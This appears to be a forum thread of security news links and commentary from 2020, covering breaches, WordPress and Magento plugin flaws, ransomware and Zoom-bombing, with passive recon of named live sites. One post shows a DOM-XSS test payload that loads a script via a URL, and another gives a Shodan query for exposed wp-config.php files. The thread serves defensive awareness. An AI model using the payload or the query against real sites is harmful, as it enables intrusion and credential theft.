Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm (https://www.cryptomuseum.com/intel/cia/rubicon.htm)
So how does this effect the average technology user?
In no way, this was cross-national espionage.
-
‘The intelligence coup of the century’
For decades, the CIA read the encrypted communications of allies and adversaries.
https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/ (https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/)
SRF > https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt (https://www.srf.ch/news/schweiz/geheimdienstaffaere-cryptoleaks-weltweite-spionage-operation-mit-schweizer-firma-aufgedeckt)
ZDF > https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html (https://www.zdf.de/politik/frontal-21/operation-rubikon-100.html)
Operation RUBICON > https://www.cryptomuseum.com/intel/cia/rubicon.htm (https://www.cryptomuseum.com/intel/cia/rubicon.htm)
So how does this effect the average technology user?
In no way, this was cross-national espionage.
Something that goes on in every country. Even if it does effect us, it isn't anything an individual can do anything about.
-
WordPress GDPR Cookie Consent plugin fixed vulnerability
https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/
-
As Asyn said, over 72.000 Word Press websites vulnerable:
https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/
&
https://wordpress.org/plugins/themegrill-demo-importer/advanced/'
Going from incident to incident with this CMS, based on "worm-can" language PHP, full of outdated and vulnerable plug-in code,
retirable jQuery libraries, misconfigured settings like "user enumeration" and "directory listing"set as "enabled".
Those that have relative knowledge do not count, those that take decisions, often lack relative knowledge.
One rather desires a "licked" website over a secure one. End-users pay the price, often coming to them as "abuse" by malcreants.
I am mentioning these issues over and over again, also in the "virus and worms", but often totally in vain.
No one to react or they are just not interested.
polonus
-
Critical Vulnerability In Profile Builder Plugin Allowed Site Takeover
https://www.wordfence.com/blog/2020/02/critical-vulnerability-in-profile-builder-plugin-allowed-site-takeover/
-
Just another Hack?
https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/ (https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/)
-
AZORult spreads as a fake ProtonVPN installer
https://securelist.com/azorult-spreads-as-a-fake-protonvpn-installer/96261/
-
Vulnerable Word Press Plug-ins attacked:
https://www.wordfence.com/blog/2020/02/multiple-attack-campaigns-targeting-recent-plugin-vulnerabilities/
Thousands of Word Press websites are at risk,
polonus
-
Even big websites have Word Press as CMS: htxps://thecsrjournal.in/wp-content/
and sometimes outdated software running..
Blacklisted external link: htXps://syndication.twitter.com/settings
The domain is blacklisted: -syndication.twitter.com from CryptoScamDB
(checked using Open Websniffer extension by Разработка и поддержка5MS 5MS dot ru).
https://syndication.twitter.com/i/jot? - widget -> %7B%22_category_%22%3A%22syndicated_impression%22%2C%22triggered_on%22%3A1582656898837%2C%22dnt%22%3Afalse%2C%22event_namespace%22%3A%7B%22client%22%3A%22tfw%22%2C%22page%22%3A%22timeline%22%2C%22action%22%3A%22impression%22%7D%7D ....
WordPress version WordPress 5.2.5
Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:OK
Web Server:
Apache/2.4.18 (Ubuntu)
X-Powered-By:
PHP/7.2.20-2+ubuntu16.04.1+deb.sury.org+1 (excessive server version info proliferation)
IP Address:
210.89.48.48
Hosting Provider:
Broadband Pacenet Pvt. Ltd
Shared Hosting:
2 sites found on 210.89.48.48 (see vulnerabilities: https://www.shodan.io/host/210.89.48.48 )
Consider: https://urlscan.io/result/7604e69d-fb8b-44a2-9736-53b4e386aecc
Outdated content: Apache under 2.4.41 http://httpd.apache.org/security/vulnerabilities_24.html
Outdated PHP: PHP under 7.2.25 -> http://php.net/ChangeLog-7.php#7.2.25
Vuln.: https://webcookies.org/cookies/thecsrjournal.in/29134540?114990 E-grade results.
Retirable jQuery libraries: Retire.js
jquery-mobile 1.3.2 Found in -https://thecsrjournal.in/wp-content/plugins/photo-gallery/js/jquery.mobile.min.js?ver=1.3.2
Vulnerability info:
Medium open redirect leads to cross site scripting
jquery 1.12.4 Found in -https://thecsrjournal.in/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Vulnerability info:
Medium 2432 3rd party CORS request may execute CVE-2015-9251
Medium CVE-2015-9251 11974 parseHTML() executes scripts in event handlers
Low CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
JavaScript syntax errors: SyntaxError: Invalid or unexpected token
/wp-content/plugins/news-ticker-tj/js/custom.js?ver=6.0.2:2
TypeError: Cannot read property 'querySelector' of null
/ etc.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
For the insecurity aware among us: http://www.nothink.org/
Know what is out there on the Interwebz...
pol
-
I have been reporting about unpatched and vulnerable PHP-based CMS software as long as I am on these here forums,
and that is quite some time. And in this case especially about Word Press flaws and Magento Webshop glitches and insecurity.
These issues showed up in many of my 3rd party cold recon scan results of vulnerable/infested Word Press driven websites,
for which I asked attention in the virus and worms section of these here forums.
Seems however all in vain, as the trained monkeys develop on
for decision makers that rather would see a "licked" website than a more secure one.
So no one seems to give "a hoot" to what this here "oldtimer", polonus, has to say.
Alas, that's how the world turns 'round these days. :'(
Now the Australian government comes with recommendations to get Word Press CMS somewhat more secure:
https://www.cyber.gov.au/publications/securing-content-management-systems
Magento driven webshops not much better situation, consider: https://publicwww.com/websites/magento+/3
(Mind this is a resource address for researchers, do not abuse the info found there >:( )
Have a nice day,
polonus
-
And another never-ending story, ransomware...yep, even here on an MS subdomain...
Re: https://www.theregister.co.uk/2020/03/04/microsoft_subdomain_takeover/
Mind to check for your fraudulous updates, folks. "Do not click to get your OS and all of your files sick".
polonus
-
Virgin Media data incident
https://www.virginmedia.com/corporate/media-centre/press-releases/virgin-medias-data-incident
https://www.virginmedia.com/help/data-incident/important-information
-
T-Mobile Data Breach Exposes Customer's Personal, Financial Info
https://www.bleepingcomputer.com/news/security/t-mobile-data-breach-exposes-customer-personal-financial-info/
-
Israeli Marketing Company Exposes Contacts Database
https://www.bankinfosecurity.com/israeli-marketing-company-exposes-contacts-database-a-13785
-
Word Press sites under attack because of vulnerable "left" plug-in code.
One could easily see that this is "left" code, never been updated since 2016 :>(
See : https://github.com/ghsh88/custom-searchable-data-entry-system
Who is installing some plug-in code from 2015/16 onto a 2020 website?
Not a very bright thing to do, isn't it?
Esy peasy for malcreants by courtesy of a PHP-based CMS (insecure outside the core-code).
Consider this testing site: https://turgensec.com/Obscurity/Obscurity.html (do not do any evil with it).
And you also are left with zero security advice here:
https://github.com/ghsh88/custom-searchable-data-entry-system/security/advisories
Also Kate at Kate@example.com cannot give you any further assistance. (info source: luntrus)
polonus
-
Many an adblock- and vpn-app is a hidden data grabbing tool:
Read: https://www.buzzfeednews.com/article/craigsilverman/vpn-and-ad-blocking-apps-sensor-tower
Mentioned here are Free and Unlimited VPN, Luna VPN, Mobile Data, & Adblock Focus found in the Google Play Store.
polonus
-
IPAS: Security Advisories for March 2020
https://blogs.intel.com/technology/2020/03/ipas-security-advisories-for-march-2020/
-
Just to stress the importance of JavaScript security in the Tor browser:
https://www.zdnet.com/article/tor-team-warns-of-tor-browser-bug-that-runs-javascript-on-sites-it-shouldnt/
Mind tor settings: about:config: extensions.torbutton.noscript_inited = true
Good to be aware of the implications of JavaScript insecurity.
JavaScript can be used to unmask the users of a particular browser and their real IP address they send over the wire,
JavaScript flaws has been used against Tor users in the past as a firefox zero-day.
FBI also used it to be able to unmask Tor browser users in the past in the Freedom Hosting hijack...
http://www.independent.ie/irish-news/courts/child-porn-accused-trying-to-move-to-russia-fbi-29574802.html
polonus
-
FBI Arrests Alleged Owner of Deer.io, a Top Broker of Stolen Accounts
https://krebsonsecurity.com/2020/03/fbi-arrests-alleged-owner-of-deer-io-a-top-broker-of-stolen-accounts/
-
Used to be a big fan of Avast and saw this today. Should not be surprised. But a warning to anyone using Avast or AVG.
https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html
where to read the official position?
-
where to read the official position?
-> https://forum.avast.com/index.php?topic=231828.0
-
Malicious corona-virus-tracker app locks your phone.
Re: https://twitter.com/LukasStefanko/status/1239826056103825408
Re: https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware
The universal key to unlock = "4865083501".
Malcreants with too much time on their hands, because of corona-virus-measures, use this to think of ways to abuse.
The one uses his free time to protect and aid others, the others to abuse and ruin for money.
Stay vigilant and do not fall for the PHISH, scam and spam.
Look before you leap, uh I mean install an app.
polonus
-
ADV200006 | Type 1 Font Parsing Remote Code Execution Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006
-
Magento-webshops kept failed log-on data in plain txt.
Better and more secure ways already exist: https://en.wikipedia.org/wiki/Digest_access_authentication
Read: https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update
Apply the hotfix: https://magento.com/security/hot-fix-available-cve-2019-8118
Scan at: https://www.magereport.com/
A better way however is to make use of digital signatures (SSH authenticatiion,
TLS client certificates, WebAuthn) because a server only keeps public data as information.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
VPN bypass vulnerability in Apple iOS
https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/
-
FBI Warns of Ongoing Zoom-Bombing Attacks on Video Meetings
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ongoing-zoom-bombing-attacks-on-video-meetings/
https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic
-
FBI Warns of Ongoing Zoom-Bombing Attacks on Video Meetings
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ongoing-zoom-bombing-attacks-on-video-meetings/ (https://www.bleepingcomputer.com/news/security/fbi-warns-of-ongoing-zoom-bombing-attacks-on-video-meetings/)
https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic (https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic)
Don't advertise your meetings on open or social websites. Protect the meeting with a password.
It isn't hard to keep the bad guys out.
-
Security Advisories: D-Link DSL-2640B
https://raelize.com/posts/d-link-dsl-2640b-security-advisories/
-
Ongoing scans for port 5555 by all kind of systems?
Two views on this and such scans:
https://www.experts-exchange.com/questions/22726184/Port-5555-is-open.html
Scanning is for an Android Device Debug Poort:
https://www.bleepingcomputer.com/news/security/tens-of-thousands-of-android-devices-are-exposing-their-debug-port/
Consider: https://www.shodan.io/search?query=Android+Debug+Bridge+port%3A5555&language=en
With all these thousands of Google Propriety Android devices and IoT-crap around, not astounding, also on 8.8.8.8.
-> https://www.shodan.io/host/8.8.8.8/raw
Cybercriminals wanna contact open ADB ports to be able to get "root".
Wahy - to silently install a Miner worm and the likes.
How to disable this port 5555 ADD service:
http://www.hacktabs.com/enable-disable-adb-wifi-rooted-non-rooted-android/
Stay vigilant users, (info credits go to luntrus)
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Here we can see what the issue is: https://viz.greynoise.io/query/?gnql=port%3A5555
Stop this firewalling see:
https://www.openbsd.org/faq/pf/filter.html#defdeny &
http://linux-training.be/networking/ch14.html#idp69772096 (or for your language).
So conclusion as for now some malicious e.g. Mirai & Telnet Scanning
polonus
-
LS
Every IP scan or domain scan or AS scan for that matter should be examined separately to know what is going on from there.
Sometimes this means benign security scans, sometimes probing with malicious intent, sometimes simple outright malware
to send out spamraids with, scam & malware (Mirai).
Let us just take a random example IP which is doing port scanning for port 5555, a scanning that comes from
IP address 112.119.218.130 in HongKong, apparently performed by netvigator (game shield) dot com domain.
VirusTotal shows 1 engine to detect, detecting spam, here we have it:
https://www.virustotal.com/gui/ip-address/112.119.218.130/detection
GreyNoise cannot help us much in these respects, just alerts the scans being performed:
https://viz.greynoise.io/query/?gnql=metadata.rdns%3An112119218130.netvigator.com
Shodan is not quite clear on what it is: https://www.shodan.io/host/112.119.218.130/raw
Again here we stumble on quite some interesting underlying data: https://intelx.io/?s=netvigator.com
Data, coming from this awful Intelligence scanner made by the firm of the renowned Peter Kleissner,
hacker/researcher/ sinkhole expert from Vienna (now Prague).
I was so happy to get some online outbuilding on automated sinkholing from him during 2017.
Summa summarum every IP address and/or domain/AS should be considered separately to what this scanning means.
I do this just through 3rd party cold recon security scanning.
In this case the buzzword apparently is "gamer SPAM".
But it could also be something quite innocent like benign bot-scans or security scantool action.
Moreover at netvigator dot com JSONP script I found flaws in the settings of their CSP implementation,
just to mention this on the by and by. (Info credits go to: luntrus)
polonus
-
WordPress removes plug-in100.000 times installed.
Left by developer. It is this plug-in that's involved: https://wordpress.org/plugins/contact-form-7-datepicker/
Where it was being reported: https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-leads
See: https://wordpress.org/support/topic/why-was-this-plugin-removed-should-i-remove-it-from-my-site/
Scan when you use WordPress with this WP security scan: https://hackertarget.com/wordpress-security-scan/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Hi robert1297,
Coronavirus means hey-days for cybercriminals all sorts, malcreants, scammers, spammers, fake-news & fraud spreaders, the lot.
Mind your "clicks" while you keep your distance also digitally. Let's stick together from home.
polonus
-
Hi robert1297,
Coronavirus means hey-days for cybercriminals all sorts, malcreants, scammers, spammers, fake-news & fraud spreaders, the lot.
Mind your "clicks" while you keep your distance also digitally. Let's stick together from home.
polonus
Nothing has change in this regard for pond scum and bottom feeders, they are quick to jump on anything of social interest.
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/
This isn't helped by legit companies asking for donations (such as PayPal) and peoples genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/ (https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/)
This isn't helped by legit companies asking for donations (such as PayPal) and peoples genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/ (https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/)
This isn't helped by legit companies asking for donations (such as PayPal) and peoples genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456
Something that most people need to view, as for me I have been watching out for pond life scammers for many many years. As long as I have been using the forums for sure :)
-
Banking Malware Spreading via COVID-19 Relief Payment Phishing
https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/ (https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/)
This isn't helped by legit companies asking for donations (such as PayPal) and peoples genuine wish to help. So these pond life scum take advantage, so no change there then.
People really need to be aware of any such scam/s relating to what is currently the hot topic in social media/news etc. In that too, nothing has changed, be suspicious and know the source you are supposedly visiting.
https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456 (https://forum.avast.com/index.php?topic=232867.msg1541456#msg1541456)
Something that most people need to view, as for me I have been watching out for pond life scammers for many many years. As long as I have been using the forums for sure :)
Sometimes,on this forum, it's hard to get folks to actually spend the time to watch a video even if it may be helpful. :)
-
<snip quotes>
Sometimes,on this forum, it's hard to get folks to actually spend the time to watch a video even if it may be helpful. :)
Unfortunately for some, they don't do anything/seek help until they are hit.
Hopefully people aren't ignoring the real Corvid-19 advice.
-
If you're using ZOOM (https://zoom.us/), here's an excellent video to make Zoom and you
more secure. https://youtu.be/-_mgnmmCv2M
-
Stop downloading "unkillable malware" apps!
Read: https://www.theregister.co.uk/2020/04/08/xhelper_android_malware/
polonus
-
L.S.
Always keep your friends close but your enemies even closer:
https://www.blackhatworld.com/seo/guides-get-this-pandemic-backlinks.1209771/
Forewarned always means being forearmed.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
@polonus
Hi!
Why is s.th. of this thread(?) not secure (see screenshot). Have I to change s.th.(where)?
;)
=Snake=
-
@polonus
Hi!
Why is s.th. of this thread(?) not secure (see screenshot). Have I to change s.th.(where)?
;)
=Snake=
There is nothing to change, whilst the site is https not all of the content is from https sources, this is typically when people attach imaged (or other elements) located on non secure locations.
Just click on the secure icon and it will tell you, see attached image.
-
Cybercriminals targeting critical healthcare institutions with ransomware
https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware
-
Cybercriminals targeting critical healthcare institutions with ransomware
https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware (https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware)
Does this really need to be in 2 places?
-
Over 500,000 Zoom accounts sold on hacker forums, the dark web
https://www.bleepingcomputer.com/news/security/over-500-000-zoom-accounts-sold-on-hacker-forums-the-dark-web/
-
Over 500,000 Zoom accounts sold on hacker forums, the dark web
https://www.bleepingcomputer.com/news/security/over-500-000-zoom-accounts-sold-on-hacker-forums-the-dark-web/ (https://www.bleepingcomputer.com/news/security/over-500-000-zoom-accounts-sold-on-hacker-forums-the-dark-web/)
Meeting credentials for me change for each meeting so does the randomly created password.
-
Starting 4/18/2020 paid customer, will be able to customize which data center regions your account can use,
by opting in or out of a specific data center region for real-time meeting data in transit.
Zoom admins and account owners of paid accounts can, at the account, group, or user level:
Opt out of specific data center regions
Opt in to specific data center regions
(https://screencast-o-matic.com/screenshots/u/Lh/1586870630256-45374.png)
-
Coronavirus Update App Leads to Project Spy Android and iOS Spyware
https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/
-
Again Word Press sites could be taken over (hijacked) through Onetone-theme flaw (software left by developer).
A good 20.000 Word Press websites now at risk.
Read: https://blog.sucuri.net/2020/04/onetone-vulnerability-leads-to-javascript-cookie-hijacking.html
and
read: https://blog.nintechnet.com/unauthenticated-stored-xss-vulnerability-in-wordpress-onetone-theme-unpatched/
Word Press Content Management Software based on PHP, a constant pain in the proverbial parts. ;D
polonus (volunteer 3rd party cold recon website security analyst and website eror-hunter)
-
Example of a vulnerable Word Press http website,
Remember WordPress is a weak and vulnerable CMS based on PHP,
see how vulnerable it can be to specific downgrade network attacks, random example:
via ",/$.getScript(%27https://localhost/test.js%27,function(){})" , which is a DOM-XSS attack ->
like here -htxp://paragon.net.uk/$.getScript(%27https://localhost/test.js%27,function(){}}
opening up to: -https://www.heg.com/wp-content/themes/renova/assets/js/bootstrap-modal.js?ver=4.9.13
which is a blacklisted site: https://sitecheck.sucuri.net/results/https/www.heg.com/wp-content/themes/renova/assets/js/bootstrap-modal.js?q=ver%3D4.9.13 (Outdated http://httpd.apache.org/security/vulnerabilities_22.html This is probably why this attack succeeded!).
Resulting in: Number of sources found: 41 ; Number of sinks found: 17
Source link: DOM XSS script -> script source: SANS Cyber Security Certs & Research.
A HTTPS Everywhere extension in your browser will block this uri inside the browser,
else a HEG main page may open up from HEG (=Host Europe Group), now part of GoDaddy's.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Sawfish phishing campaign targets GitHub users
https://github.blog/2020-04-14-sawfish-phishing-campaign-targets-github-users/
-
A third of Tor Project staff have lost their jobs.
Read: https://blog.torproject.org/covid19-impact-tor
Coronavirus crisis & the "Globalonia forces" have quite some impact on the availability of reliable entry-nodes.
Many old sw-versions circulate with similarity hashes. Be aware!
Insecure onion addresses galore: -http://expyuzz4wqqyqhjn.onion/press/press.html
and -https://creep7nissfumwyx.onion/tor/press/press.html.en
polonus
-
Cognizant dot com hit by Maze-ransomware.
What is Maze? -> https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
Read: https://news.cognizant.com/2020-04-18-cognizant-security-update
Background search on Intelligence X: https://intelx.io/?s=cognizant.com (interesting results?
e.g. abuse of Hong Kong domain for sale: https://www.sec.gov/litigation/admin/2014/34-73862.pdf )
polonus
-
267 million Facebook profiles sold for $600 on the dark web
https://www.bleepingcomputer.com/news/security/267-million-facebook-profiles-sold-for-600-on-the-dark-web/
-
NSA and ASD warn against Webshell cyberattacks and give advice as how to protect against such cyberthreats:
http://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/
polonus
-
Analysis and YARA Rule: https://capesandbox.com/analysis/1118/
YARA . https://capesandbox.com/analysis/1118/
See: https://github.com/ctxis/CAPE/blob/master/data/yara/binaries/shellcodes.yar
Security Hole in ZyxelSecuManager attacked -
analysis: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
See: https://urlhaus.abuse.ch/host/irc.hoaxcalls.pw/
See the many vulnerabilities and flaws on the IP hoster: https://www.shodan.io/host/178.32.148.5
Consider also excessive server info proliferation there,
and https://security-tracker.debian.org/tracker/source-package/openssh
and https://www.cvedetails.com/vulnerability-list.php?vendor_id=23&product_id=0&version_id=0&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&cweid=0&order=1&trc=3197&sha=44f4e52af695bf3a090cd5aace57faab7e087bbf
& particularly enumeration user disclosure flaw...
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
French Subscribers to Famous News Site at Risk from Hacking, Fraud
https://www.safetydetectives.com/blog/lefigaro-leak-report/
-
Word Press CMS with 5 vulnerable extensions being attacked:
https://www.wordfence.com/blog/2020/05/nearly-a-million-wp-sites-targeted-in-large-scale-attacks/
polonus
-
A million Word-Press sites are at risk from an actively attacked hole in the Elementor-Pro plug-in.
Read: https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
I have been warning against security issues with this a-priory-insecure CMS, that often has outdated kernel-code (old versions) based on often can-of-worms-PHP-language, with many vulnerable or left plug-ins and themes. Often wrongly set default settings for user enumeration and directory listing and outdated retirable jQuery code libraries.
Automatic updating procedures may break your website code.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
And again approx. 1200 infections on webshops running a PHP based CMS - backtracking MageCart infections
Read:
https://maxkersten.nl/2020/05/06/backtracking-magecart-infections/ (info credits -> Max Kersten)
Scan here: https://www.magereport.com/ and stay fully updated and fully patched!
polonus
-
Hacker group selling databases with millions of user credentials busted in Poland and Switzerland
https://www.europol.europa.eu/newsroom/news/hacker-group-selling-databases-millions-of-user-credentials-busted-in-poland-and-switzerland
-
Top 10 Routinely Exploited Vulnerabilities | CISA (used by State actors and Cybercriminals alike):
https://www.us-cert.gov/ncas/alerts/aa20-133a
source: National Cyber Awareness System,
polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
-
1.3 million Word Press sites targeted by a single malcreant:
Re: https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/
Attacked were WP extensions like Easy2Map, Blog Designer, WP GDPR Compliance, Total Donations and also Newspaper-theme.
On one of the IP abused: https://intodns.com/bringtolightnyc.org Apache/2 E-Tag "2c-59c5c662ca35e"
polonus
-
The Unattributable leak your data: 23 million e-mail addresses leaked from a non-protected Elasticsearch-server.
But the original "scraper" cannot be defined and be held responsible as the cloud service does not provide us with names,
only gives out "unattributable". Cybercriminals often have more protection then legit end-users have. Sad but true fact.
Read: https://www.troyhunt.com/the-unattributable-db8151dd-data-breach/
polonus
-
North Korean Malicious Cyber Activity
https://www.us-cert.gov/northkorea
-
Interesting background analysis reads on REvil ransomware:
https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
& https://www.kpn.com/security-blogs/Tracking-REvil.htm
polonus
-
https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-15-2020-ee79ol/a-a27pt4o
-
Supercomputers hacked across Europe to mine crytocurrency:
https://www.zdnet.com/article/supercomputers-hacked-across-europe-to-mine-cryptocurrency/
polonus
-
EasyJet hacked: data breach affects 9 million customers
https://www.bleepingcomputer.com/news/security/easyjet-hacked-data-breach-affects-9-million-customers/
http://otp.investis.com/clients/uk/easyjet1/rns/regulatory-story.aspx?cid=2&newsid=1391756
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/05/21/11/26/cYhrXOkd85/preview.jpg)
-
Polonus stumbled upon this http-address in France: http://perso102-g5.free.fr/info.php
Not being secure and wondering what was goin'on there, we scanned IP: https://www.shodan.io/host/212.27.63.102 -> -leading to: -http://perso102-g5.free.fr/info.php
Re: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cHt9c10xMDItZzUuZn17ey5mfWBbbmZdLnBocA%3D%3D~enc
Vulnerable SSL OpenSSL, headers - 1.0.1t 7.8 vulnerabilities:
code found: https://www.openssl.org/news/vulnerabilities.html via vulners extension in the browser.
Seems this route is (ab)used for ad-monetizing activities via Akidom service over insecure connections.
There is a lot going on under the hood in the browser, the average user is not aware of,
that is why polonus now and then dare to take a glimpse of what is going on there ;)
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Home Chef announces data breach after hacker sells 8M user records
https://www.bleepingcomputer.com/news/security/home-chef-announces-data-breach-after-hacker-sells-8m-user-records/
https://support.homechef.com/hc/en-us/sections/360008878052-Home-Chef-Data-Security-Incident
-
FBI warns Magento-webshop for attacks via MAGMI Data Import Tool.
Considering: https://nvd.nist.gov/vuln/detail/CVE-2017-7391
What can be done to use Magmi Data Import Tool in a more secure way:
https://magentary.com/kb/securing-magmi-data-import-tool/
Before venturing out to a webshop or as a webshop site owner or admin just scan here for insecurity:
https://www.magereport.com
Still one-box-solution-vendors standing in the shadow luring to use their product, read:
https://firebearstudio.com/blog/magento-2-magmi-integration.html
They also support integration of outphased insecure magento-1. :o
On that address@ firebearstudio dot com website they also use vulnerable PHP, headers - 7.2.18.
Not a real recommendation i.m.h.o.
polonus
-
Hacker shares 40 million Wishbone user records for free
https://www.bleepingcomputer.com/news/security/hacker-shares-40-million-wishbone-user-records-for-free/
-
Voter info for millions of Indonesians shared on hacker forum
https://www.bleepingcomputer.com/news/security/voter-info-for-millions-of-indonesians-shared-on-hacker-forum/
-
Mathway investigates data breach after 25M records sold on dark web
https://www.bleepingcomputer.com/news/security/mathway-investigates-data-breach-after-25m-records-sold-on-dark-web/
-
@Asyn,
I'm beginning to fee like I should be going to Bleeping Computers?
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/05/23/12/55/cYh0lNkWOm/preview.jpg)
https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-15-2020-ee79ol/a-a27pt4o (https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-15-2020-ee79ol/a-a27pt4o)
-
Getting too little notice: Sarwent Malware Continues to Evolve:
Re: https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
Research by Jason Reaves (info credits go there),
Malware opens up RDP-firewall-port and has TrickBot like actions.
polonus
-
26 million LiveJournal accounts being shared on hacker forums
https://www.bleepingcomputer.com/news/security/26-million-livejournal-accounts-being-shared-on-hacker-forums/
-
SANDWORM ACTORS EXPLOITING VULNERABILITY IN EXIM MAIL TRANSFER AGENT
https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/01/12/16/cY1VlDpg3f/preview.jpg)
https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-29-2020-eern4i
-
SANDWORM ACTORS EXPLOITING VULNERABILITY IN EXIM MAIL TRANSFER AGENT
https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf
Russian Actors Are Targeting Vulnerable Exim Mail Servers. Patching Is Up, but More Than 900k Remain Online
https://www.riskiq.com/blog/labs/vulnerable-exim-mail-servers/
-
Attackers - Large scale attack campaign tragets database credentials - database password,
Re: https://www.wordfence.com/blog/2020/06/large-scale-attack-campaign-targets-database-credentials/
What they were after is wp-config.php file which may hold particular credentials:
https://www.shodan.io/search?query=wp-config.php
Example some http:// IP address -/wordpress/wp-admin/setup-config.php
Response headers PHP/7.2.29 on Apache/2.4.43 (Win64)
